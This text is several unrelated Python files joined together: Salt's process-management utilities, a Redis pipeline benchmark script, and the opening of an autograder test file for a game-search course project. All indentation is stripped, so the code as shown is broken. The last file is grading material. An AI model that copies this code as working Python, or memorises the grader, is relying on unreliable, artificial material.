# A normal daemonization redirects the process output to /dev/null.
# Unfortunately when a python multiprocess is called the output is
# not cleanly redirected and the parent process dies when the
# multiprocessing process attempts to access stdout or err.
if redirect_out:
with salt.utils.files.fopen("/dev/null", "r+") as dev_null:
# Redirect python stdin/out/err
# and the os stdin/out/err which can be different
dup2(dev_null, sys.stdin)
dup2(dev_null, sys.stdout)
dup2(dev_null, sys.stderr)
dup2(dev_null, 0)
dup2(dev_null, 1)
dup2(dev_null, 2)
def dup2(file1, file2):
"""
Duplicate file descriptor fd to fd2, closing the latter first if necessary.
This method is similar to os.dup2 but ignores streams that do not have a
supported fileno method.
"""
if isinstance(file1, int):
fno1 = file1
else:
try:
fno1 = file1.fileno()
except io.UnsupportedOperation:
log.warning("Unsupported operation on file: %r", file1)
return
if isinstance(file2, int):
fno2 = file2
else:
try:
fno2 = file2.fileno()
except io.UnsupportedOperation:
log.warning("Unsupported operation on file: %r", file2)
return
os.dup2(fno1, fno2)
def daemonize_if(opts):
"""
Daemonize a module function process if multiprocessing is True and the
process is not being called by salt-call
"""
if "salt-call" in sys.argv[0]:
return
if not opts.get("multiprocessing", True):
return
if sys.platform.startswith("win"):
return
daemonize(False)
def systemd_notify_call(action):
process = subprocess.Popen(
["systemd-notify", action], stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
"""
Notify systemd that this process has started
"""
try:
import systemd.daemon # pylint: disable=no-name-in-module
except ImportError:
if salt.utils.path.which("systemd-notify") and systemd_notify_call("--booted"):
# Notify systemd synchronously
notify_socket = os.getenv("NOTIFY_SOCKET")
if notify_socket:
# Handle abstract namespace socket
if notify_socket.startswith("@"):
notify_socket = "\0{}".format(notify_socket[1:])
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.connect(notify_socket)
sock.sendall(b"READY=1")
sock.close()
except OSError:
return systemd_notify_call("--ready")
return True
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify("READY=1")
except SystemError:
# Daemon was not started by systemd
pass
def get_process_info(pid=None):
"""
Gets basic info about a process.
pid: None, or int: None will get the current process pid
Return: None or Dict
"""
if pid is None:
pid = os.getpid()
elif not psutil.pid_exists(pid):
return
raw_process_info = psutil.Process(pid)
# pid_exists can have false positives
# for example Windows reserves PID 5 in a hack way
# another reasons is the the process requires kernel permissions
try:
raw_process_info.status()
except psutil.NoSuchProcess:
return None
return {
"pid": raw_process_info.pid,
"name": raw_process_info.name(),
"start_time": raw_process_info.create_time(),
}
def claim_mantle_of_responsibility(file_name):
"""
Checks that no other live processes has this responsibility.
If claiming the mantle of responsibility was successful True will be returned.
file_name: str
Return: bool
"""
# all OSs supported by salt has psutil
if not HAS_PSUTIL:
log.critical(
"Assuming no other Process has this responsibility! pidfile: %s", file_name
)
return True
# add file directory if missing
file_directory_name = os.path.dirname(file_name)
if not os.path.isdir(file_directory_name) and file_directory_name:
os.makedirs(file_directory_name)
# get process info from file
file_process_info = None
try:
with salt.utils.files.fopen(file_name, "r") as file:
file_process_info = json.load(file)
except json.decoder.JSONDecodeError:
log.error("pidfile: %s is corrupted", file_name)
except FileNotFoundError:
log.info("pidfile: %s not found", file_name)
this_process_info = get_process_info()
# check if this process all ready has the responsibility
if file_process_info == this_process_info:
return True
if not isinstance(file_process_info, dict) or not isinstance(
file_process_info.get("pid"), int
):
file_process_info = None
# check if process is still alive
if isinstance(file_process_info, dict) and file_process_info == get_process_info(
file_process_info.get("pid")
):
return False
# process can take the mantle of responsibility
with salt.utils.files.fopen(file_name, "w") as file:
json.dump(this_process_info, file)
return True
def check_mantle_of_responsibility(file_name):
"""
Sees who has the mantle of responsibility
file_name: str
Return: None or int
"""
# all OSs supported by salt has psutil
if not HAS_PSUTIL:
log.critical(
"Assuming no other Process has this responsibility! pidfile: %s", file_name
)
return
# get process info from file
try:
with salt.utils.files.fopen(file_name, "r") as file:
file_process_info = json.load(file)
except json.decoder.JSONDecodeError:
log.error("pidfile: %s is corrupted", file_name)
return
except FileNotFoundError:
log.info("pidfile: %s not found", file_name)
return
if not isinstance(file_process_info, dict) or not isinstance(
file_process_info.get("pid"), int
):
return
if file_process_info == get_process_info(file_process_info["pid"]):
return file_process_info["pid"]
def set_pidfile(pidfile, user):
"""
Save the pidfile
"""
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.files.fopen(pidfile, "w+") as ofile:
ofile.write(str(os.getpid()))
except OSError:
pass
log.debug("Created pidfile: %s", pidfile)
if salt.utils.platform.is_windows():
return True
import pwd # after confirming not running Windows
# import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
# groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except (KeyError, IndexError):
sys.stderr.write(
"Failed to set the pid to user: {}. The user is not available.\n".format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = "Failed to set the ownership of PID file {} to user {}.".format(
pidfile, user
)
log.debug("%s Traceback follows:", msg, exc_info=True)
sys.stderr.write("{}\n".format(msg))
sys.exit(err.errno)
log.debug("Chowned pidfile: %s to user: %s", pidfile, user)
def check_pidfile(pidfile):
"""
Determine if a pidfile has been written out
"""
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
"""
Return the pid from a pidfile as an integer
"""
try:
with salt.utils.files.fopen(pidfile) as pdf:
pid = pdf.read().strip()
return int(pid)
except (OSError, TypeError, ValueError):
return -1
def clean_proc(proc, wait_for_kill=10):
"""
Generic method for cleaning up multiprocessing procs
"""
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error("Process did not die with terminate(): %s", proc.pid)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
"""
Use OS facilities to determine if a process is running
"""
if isinstance(pid, str):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool:
"""
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
"""
def __init__(self, num_threads=None, queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` atttribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug(
"ThreadPool executing func: %s with args=%s kwargs=%s",
func,
args,
kwargs,
)
func(*args, **kwargs)
except Exception as err: # pylint: disable=broad-except
log.debug(err, exc_info=True)
class ProcessManager:
"""
A class which will manage processes that should be running
"""
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
"""
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
"""
if args is None:
args = []
if kwargs is None:
kwargs = {}
if inspect.isclass(tgt) and issubclass(tgt, multiprocessing.Process):
kwargs["name"] = name or tgt.__qualname__
process = tgt(*args, **kwargs)
else:
process = Process(
target=tgt, args=args, kwargs=kwargs, name=name or tgt.__qualname__
)
if isinstance(process, SignalHandlingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '%s' with pid %s", process.name, process.pid)
self._process_map[process.pid] = {
"tgt": tgt,
"args": args,
"kwargs": kwargs,
"Process": process,
}
return process
def restart_process(self, pid):
"""
Create new process (assuming this one is dead), then remove the old one
"""
if self._restart_processes is False:
return
exit = self._process_map[pid]["Process"].exitcode
if exit > 0:
log.info(
"Process %s (%s) died with exit status %s, restarting...",
self._process_map[pid]["tgt"],
pid,
self._process_map[pid]["Process"].exitcode,
)
else:
log.debug(
"Process %s (%s) died with exit status %s, restarting...",
self._process_map[pid]["tgt"],
pid,
self._process_map[pid]["Process"].exitcode,
)
# don't block, the process is already dead
self._process_map[pid]["Process"].join(1)
self.add_process(
self._process_map[pid]["tgt"],
self._process_map[pid]["args"],
self._process_map[pid]["kwargs"],
)
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal_):
if salt.utils.platform.is_windows() and signal_ in (
signal.SIGTERM,
signal.SIGINT,
):
# On Windows, the subprocesses automatically have their signal
# handlers invoked. If you send one of these signals while the
# signal handler is running, it will kill the process where it
# is currently running and the signal handler will not finish.
# This will also break the process tree: children of killed
# children will become parentless and not findable when trying
# to kill the process tree (they don't inherit their parent's
# parent). Hence the 'MWorker' processes would be left over if
# the 'ReqServer' process is killed this way since 'taskkill'
# with the tree option will not be able to find them.
return
for pid in self._process_map.copy().keys():
try:
os.kill(pid, signal_)
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
def run(self, asynchronous=False):
"""
Load and start all available api modules
"""
log.debug("Process Manager starting!")
if multiprocessing.current_process().name != "MainProcess":
appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are no SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self._handle_signals)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are no SIGINT handlers installed, install ours
signal.signal(signal.SIGINT, self._handle_signals)
while True:
log.trace("Process manager iteration")
try:
# in case someone died while we were waiting...
self.check_children()
# The event-based subprocesses management code was removed from here
# because os.wait() conflicts with the subprocesses management logic
# implemented in `multiprocessing` package. See #35480 for details.
if asynchronous:
yield gen.sleep(10)
else:
time.sleep(10)
if not self._process_map:
break
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
except OSError as exc: # pylint: disable=duplicate-except
# IOError with errno of EINTR (4) may be raised
# when using time.sleep() on Windows.
if exc.errno != errno.EINTR:
raise
break
def check_children(self):
"""
Check the children once
"""
if self._restart_processes is True:
for pid, mapping in self._process_map.copy().items():
if not mapping["Process"].is_alive():
log.trace("Process restart of %s", pid)
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
"""
Kill all of the children
"""
if salt.utils.platform.is_windows():
if multiprocessing.current_process().name != "MainProcess":
# Since the main process will kill subprocesses by tree,
# no need to do anything in the subprocesses.
# Sometimes, when both a subprocess and the main process
# call 'taskkill', it will leave a 'taskkill' zombie process.
# We want to avoid this.
return
with salt.utils.files.fopen(os.devnull, "wb") as devnull:
for pid, p_map in self._process_map.items():
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
["taskkill", "/F", "/T", "/PID", str(pid)],
stdout=devnull,
stderr=devnull,
)
p_map["Process"].terminate()
else:
for pid, p_map in self._process_map.copy().items():
log.trace("Terminating pid %s: %s", pid, p_map["Process"])
if args:
# escalate the signal to the process
try:
os.kill(pid, args[0])
except OSError:
pass
try:
p_map["Process"].terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not p_map["Process"].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace("Waiting to kill process manager children")
while self._process_map and time.time() < end_time:
for pid, p_map in self._process_map.copy().items():
log.trace("Joining pid %s: %s", pid, p_map["Process"])
p_map["Process"].join(0)
if not p_map["Process"].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in self._process_map.copy().items():
if not p_map["Process"].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace("Killing pid %s: %s", pid, p_map["Process"])
try:
os.kill(pid, signal.SIGKILL)
except OSError as exc:
log.exception(exc)
# in case the process has since decided to die, os.kill returns OSError
if not p_map["Process"].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get("retry", 3)
if available_retries >= 0:
log.info(
"Some processes failed to respect the KILL signal: %s",
"; ".join(
"Process: {} (Pid: {})".format(v["Process"], k)
for ( # pylint: disable=str-format-in-logging
k,
v,
) in self._process_map.items()
),
)
log.info("kill_children retries left: %s", available_retries)
kwargs["retry"] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
"Failed to kill the following processes: %s",
"; ".join(
"Process: {} (Pid: {})".format(v["Process"], k)
for ( # pylint: disable=str-format-in-logging
k,
v,
) in self._process_map.items()
),
)
log.warning(
"Salt will either fail to terminate now or leave some "
"zombie processes behind"
)
def terminate(self):
"""
Properly terminate this process manager instance
"""
self.stop_restarting()
self.send_signal_to_processes(signal.SIGTERM)
self.kill_children()
def _handle_signals(self, *args, **kwargs):
# first lets reset signal handlers to default one to prevent running this twice
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
self.stop_restarting()
self.send_signal_to_processes(signal.SIGTERM)
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
# Terminate child processes
self.kill_children(*args, **kwargs)
class Process(multiprocessing.Process):
"""
Salt relies on this custom implementation of :py:class:`~multiprocessing.Process` to
simplify/automate some common procedures, for example, logging in the new process is
configured for "free" for every new process.
This is most important in platforms which default to ``spawn` instead of ``fork`` for
new processes.
This is achieved by some dunder methods in the class:
* ``__new__``:
This method ensures that any arguments and/or keyword arguments that are passed to
``__init__`` are captured.
By having this information captured, we can define ``__setstate__`` and ``__getstate__``
to automatically take care of reconstructing the object state on spawned processes.
* ``__getstate__``:
This method should return a dictionary which will be used as the ``state`` argument to
:py:method:`salt.utils.process.Process.__setstate__`.
Usually, when subclassing, this method does not need to be implemented, however,
if implemented, `super()` **must** be called.
* ``__setstate__``:
This method reconstructs the object on the spawned process.
The ``state`` argument is constructed by the
:py:method:`salt.utils.process.Process.__getstate__` method.
Usually, when subclassing, this method does not need to be implemented, however,
if implemented, `super()` **must** be called.
An example of where ``__setstate__`` and ``__getstate__`` needed to be subclassed can be
seen in :py:class:`salt.master.MWorker`.
The gist of it is something like, if there are internal attributes which need to maintain
their state on spawned processes, then, subclasses must implement ``__getstate__`` and
``__setstate__`` to ensure that.
For example:
.. code-block:: python
import salt.utils.process
class MyCustomProcess(salt.utils.process.Process):
def __init__(self, opts, **kwargs):
super().__init__(**kwargs)
self.opts = opts
# This attribute, counter, should only start at 0 on the initial(parent) process.
# Any child processes, need to carry the current value of the counter(instead of
# starting at zero).
self.counter = 0
def __getstate__(self):
state = super().__getstate__()
state.update(
{
"counter": self.counter,
}
)
return state
def __setstate__(self, state):
super().__setstate__(state)
self.counter = state["counter"]
"""
def __new__(cls, *args, **kwargs):
"""
This method ensures that any arguments and/or keyword arguments that are passed to
``__init__`` are captured.
By having this information captured, we can define ``__setstate__`` and ``__getstate__``
to automatically take care of object pickling which is required for platforms that
spawn processes instead of forking them.
"""
# We implement __new__ because we want to capture the passed in *args and **kwargs
# in order to remove the need for each class to implement __getstate__ and __setstate__
# which is required on spawning platforms
instance = super().__new__(cls)
instance._after_fork_methods = []
instance._finalize_methods = []
if salt.utils.platform.spawning_platform():
# On spawning platforms, subclasses should call super if they define
# __setstate__ and/or __getstate__
instance._args_for_getstate = copy.copy(args)
instance._kwargs_for_getstate = copy.copy(kwargs)
return instance
def __init__(self, *args, **kwargs):
log_queue = kwargs.pop("log_queue", None)
log_queue_level = kwargs.pop("log_queue_level", None)
super().__init__(*args, **kwargs)
self.log_queue = log_queue
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
self.log_queue_level = log_queue_level
if self.log_queue_level is None:
self.log_queue_level = salt.log.setup.get_multiprocessing_logging_level()
# Because we need to enforce our after fork and finalize routines,
# we must wrap this class run method to allow for these extra steps
# to be executed pre and post calling the actual run method,
# having subclasses call super would just not work.
#
# We use setattr here to fool pylint not to complain that we're
# overriding run from the subclass here
setattr(self, "run", self.__decorate_run(self.run))
# __setstate__ and __getstate__ are only used on spawning platforms.
def __setstate__(self, state):
"""
This method reconstructs the object on the spawned process.
The ``state`` argument is constructed by :py:method:`salt.utils.process.Process.__getstate__`.
Usually, when subclassing, this method does not need to be implemented, however,
if implemented, `super()` **must** be called.
"""
args = state["args"]
kwargs = state["kwargs"]
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
for (function, args, kwargs) in state["after_fork_methods"]:
self.register_after_fork_method(function, *args, **kwargs)
for (function, args, kwargs) in state["finalize_methods"]:
self.register_finalize_method(function, *args, **kwargs)
def __getstate__(self):
"""
This method should return a dictionary which will be used as the ``state`` argument to
:py:method:`salt.utils.process.Process.__setstate__`.
Usually, when subclassing, this method does not need to be implemented, however,
if implemented, `super()` **must** be called.
"""
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if "log_queue" not in kwargs:
kwargs["log_queue"] = self.log_queue
if "log_queue_level" not in kwargs:
kwargs["log_queue_level"] = self.log_queue_level
return {
"args": args,
"kwargs": kwargs,
"after_fork_methods": self._after_fork_methods,
"finalize_methods": self._finalize_methods,
}
def __decorate_run(self, run_func):
@functools.wraps(run_func)
def wrapped_run_func():
# Static after fork method, always needs to happen first
appendproctitle(self.name)
try:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run salt.log.setup.set_multiprocessing_logging_queue() on %s",
self,
)
try:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run salt.log.setup.set_multiprocessing_logging_level() on %s",
self,
)
try:
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run salt.log.setup.setup_multiprocessing_logging() on %s",
self,
)
for method, args, kwargs in self._after_fork_methods:
try:
method(*args, **kwargs)
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run after fork callback on %s; method=%r; args=%r; and kwargs=%r",
self,
method,
args,
kwargs,
)
continue
try:
return run_func()
except SystemExit: # pylint: disable=try-except-raise
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception: # pylint: disable=broad-except
log.error(
"An un-handled exception from the multiprocessing process "
"'%s' was caught:\n",
self.name,
exc_info=True,
)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
finally:
try:
for method, args, kwargs in self._finalize_methods:
try:
method(*args, **kwargs)
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run finalize callback on %s; method=%r; args=%r; and kwargs=%r",
self,
method,
args,
kwargs,
)
continue
finally:
# Static finalize method, should always run last
try:
salt.log.setup.shutdown_multiprocessing_logging()
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to run salt.log.setup.shutdown_multiprocessing_logging() on %s",
self,
)
return wrapped_run_func
def register_after_fork_method(self, function, *args, **kwargs):
"""
Register a function to run after the process has forked
"""
after_fork_method_tuple = (function, args, kwargs)
if after_fork_method_tuple not in self._after_fork_methods:
self._after_fork_methods.append(after_fork_method_tuple)
def register_finalize_method(self, function, *args, **kwargs):
"""
Register a function to run as process terminates
"""
finalize_method_tuple = (function, args, kwargs)
if finalize_method_tuple not in self._finalize_methods:
self._finalize_methods.append(finalize_method_tuple)
class MultiprocessingProcess(Process):
"""
This class exists for backwards compatibility and to properly deprecate it.
"""
def __init__(self, *args, **kwargs):
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using '{name}.MultiprocessingProcess' and instead use "
"'{name}.Process'. '{name}.MultiprocessingProcess' will go away "
"after {{date}}.".format(name=__name__),
stacklevel=3,
)
super().__init__(*args, **kwargs)
class SignalHandlingProcess(Process):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._signal_handled = multiprocessing.Event()
self.register_after_fork_method(SignalHandlingProcess._setup_signals, self)
def signal_handled(self):
return self._signal_handled.is_set()
def _setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
self._signal_handled.set()
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
msg = "{} received a ".format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += "SIGINT"
elif signum == signal.SIGTERM:
msg += "SIGTERM"
msg += ". Exiting"
log.debug(msg)
if HAS_PSUTIL:
try:
process = psutil.Process(os.getpid())
if hasattr(process, "children"):
for child in process.children(recursive=True):
try:
if child.is_running():
child.terminate()
except psutil.NoSuchProcess:
log.warning(
"Unable to kill child of process %d, it does "
"not exist. My pid is %d",
self.pid,
os.getpid(),
)
except psutil.NoSuchProcess:
log.warning(
"Unable to kill children of process %d, it does not exist."
"My pid is %d",
self.pid,
os.getpid(),
)
sys.exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super().start()
class SignalHandlingMultiprocessingProcess(SignalHandlingProcess):
"""
This class exists for backwards compatibility and to properly deprecate it.
"""
def __init__(self, *args, **kwargs):
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using '{name}.SignalHandlingMultiprocessingProcess' and"
" instead use '{name}.SignalHandlingProcess'."
" '{name}.SignalHandlingMultiprocessingProcess' will go away after"
" {{date}}.".format(name=__name__),
stacklevel=3,
)
super().__init__(*args, **kwargs)
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
try:
saved_signal = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
except ValueError as exc:
# This happens when a netapi module attempts to run a function
# using wheel_async, because the process trying to register signals
# will not be the main PID.
log.trace("Failed to register signal for signum %d: %s", signum, exc)
else:
old_signals[signum] = saved_signal
try:
# Do whatever is needed with the reset signals
yield
finally:
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
class SubprocessList:
def __init__(self, processes=None, lock=None):
if processes is None:
self.processes = []
else:
self.processes = processes
if lock is None:
self.lock = multiprocessing.Lock()
else:
self.lock = lock
self.count = 0
def add(self, proc):
with self.lock:
self.processes.append(proc)
log.debug("Subprocess %s added", proc.name)
self.count += 1
def cleanup(self):
with self.lock:
for proc in self.processes:
if proc.is_alive():
continue
proc.join()
self.processes.remove(proc)
self.count -= 1
log.debug("Subprocess %s cleaned up", proc.name)
|
scripts.py
|
import time
import functools
import redis
from flask import Flask, request, jsonify
from threading import Thread
from multiprocessing import Process
# from multiprocessing import Pool
pool = redis.ConnectionPool(host='127.0.0.1',
port='6379',
db=6,
encoding='utf-8',
decode_responses=True)
r = redis.StrictRedis(
connection_pool=pool
)
def direct(r):
r.sadd('test_info', '123')
r.expire('test_info', 2)
r.get('redis_test')
r.set('redis_test', 5)
r.expire('redis_test', 10)
def incry(r):
m = r.incr('test_incry')
print(m)
def pipeline(r):
p = r.pipeline()
p.sadd('test_info', '123')
p.expire('test_info', 2)
p.get('redis_test')
p.set('redis_test', 5)
p.expire('redis_test', 10)
p.execute()
def main():
s = time.time()
for _ in range(0,50000):
pipeline(r)
print(time.time() - s)
def run_1(r):
for _ in range(0, 1000):
incry(r)
def multi_main():
# jobs = [Process(target=run_1, args=(r,)) for x in range(0,5)]
jobs = [Thread(target=run_1, args=(r,)) for x in range(0,5)]
print(jobs)
s = time.time()
for j in jobs:
j.start()
for j in jobs:
j.join()
print(time.time() - s)
if __name__ == "__main__":
main()
# multi_main()
# python -m cProfile -o test.pstats scripts.py
# python -m cProfile -s cumulative scripts.py
# snakeviz test.pstats
# gprof2dot -f pstats test.pstats | dot -Tpng -o output.png && eog output.png
# kernprof -l -v scripts.py
# python -m line_profiler scripts.py.lprof
# 5000次, 5进程, 0.5s-pipeline
# 5000, 5进程, 0.9s-connection
#
|
agent_test.py
|
"""
This file contains test cases to verify the correct implementation of the
functions required for this project including minimax, alphabeta, and iterative
deepening. The heuristic function is tested for conformance to the expected
interface, but cannot be automatically assessed for correctness.
STUDENTS SHOULD NOT NEED TO MODIFY THIS CODE. IT WOULD BE BEST TO TREAT THIS
FILE AS A BLACK BOX FOR TESTING.
"""
import random
import unittest
import timeit
import sys
import isolation
import game_agent
from collections import Counter
from copy import deepcopy
from copy import copy
from functools import wraps
from queue import Queue
from threading import Thread
from multiprocessing import TimeoutError
from queue import Empty as QueueEmptyError
from importlib import reload
WRONG_MOVE = """
The {} function failed because it returned a non-optimal move at search depth {}.
Valid choices: {}
Your selection: {}
"""
WRONG_NUM_EXPLORED = """
Your {} search visited the wrong nodes at search depth {}. If the number
of visits is too large, make sure that iterative deepening is only
running when the `iterative` flag is set in the agent constructor.
Max explored size: {}
Number you explored: {}
"""
UNEXPECTED_VISIT = """
Your {} search did not visit the number of expected unique nodes at search
depth {}.
Max explored size: {}
Number you explored: {}
"""
ID_FAIL = """
Your agent explored the wrong number of nodes using Iterative Deepening and
minimax. Remember that ID + MM should check every node in each layer of the
game tree before moving on to the next layer.
"""
INVALID_MOVE = """
Your agent returned an invalid move. Make sure that your function returns
a selection when the search times out during iterative deepening.
Valid choices: {!s}
Your choice: {}
"""
TIMER_MARGIN = 15 # time (in ms) to leave on the timer to avoid timeout
def curr_time_millis():
"""Simple timer to return the current clock time in milliseconds."""
return 1000 * timeit.default_timer()
def handler(obj, testcase, queue):
"""Handler to pass information between threads; used in the timeout
function to abort long-running (i.e., probably hung) test cases.
"""
try:
queue.put((None, testcase(obj)))
except:
queue.put((sys.exc_info(), None))
def timeout(time_limit):
"""Function decorator for unittest test cases to specify test case timeout.
The timer mechanism works by spawning a new thread for the test to run in
and using the timeout handler for the thread-safe queue class to abort and
kill the child thread if it doesn't return within the timeout.
It is not safe to access system resources (e.g., files) within test cases
wrapped by this timer.
"""
def wrapUnitTest(testcase):
@wraps(testcase)
def testWrapper(self):
queue = Queue()
try:
p = Thread(target=handler, args=(self, testcase, queue))
p.daemon = True
p.start()
err, res = queue.get(timeout=time_limit)
p.join()
if err:
raise err[0](err[1]).with_traceback(err[2])
return res
except QueueEmptyError:
raise TimeoutError("Test aborted due to timeout. Test was " +
"expected to finish in less than {} second(s).".format(time_limit))
return testWrapper
return wrapUnitTest
def makeEvalTable(table):
"""Use a closure to create a heuristic function that returns values from
a table that maps board locations to constant values. This supports testing
the minimax and alphabeta search functions.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
row, col = game.get_player_location(player)
return table[row][col]
return score
def makeEvalStop(limit, timer, value=None):
"""Use a closure to create a heuristic function that forces the search
timer to expire when a fixed number of node expansions have been perfomred
during the search. This ensures that the search algorithm should always be
in a predictable state regardless of node expansion order.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if timer.time_left() < 0:
raise TimeoutError("Timer expired during search. You must " +
"return an answer before the timer reaches 0.")
if limit == game.counts[0]:
timer.time_limit = 0
return 0
return score
def makeBranchEval(first_branch):
"""Use a closure to create a heuristic function that evaluates to a nonzero
score when the root of the search is the first branch explored, and
otherwise returns 0. This heuristic is used to force alpha-beta to prune
some parts of a game tree for testing.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if not first_branch:
first_branch.append(game.root)
if game.root in first_branch:
return 1.
return 0.
return score
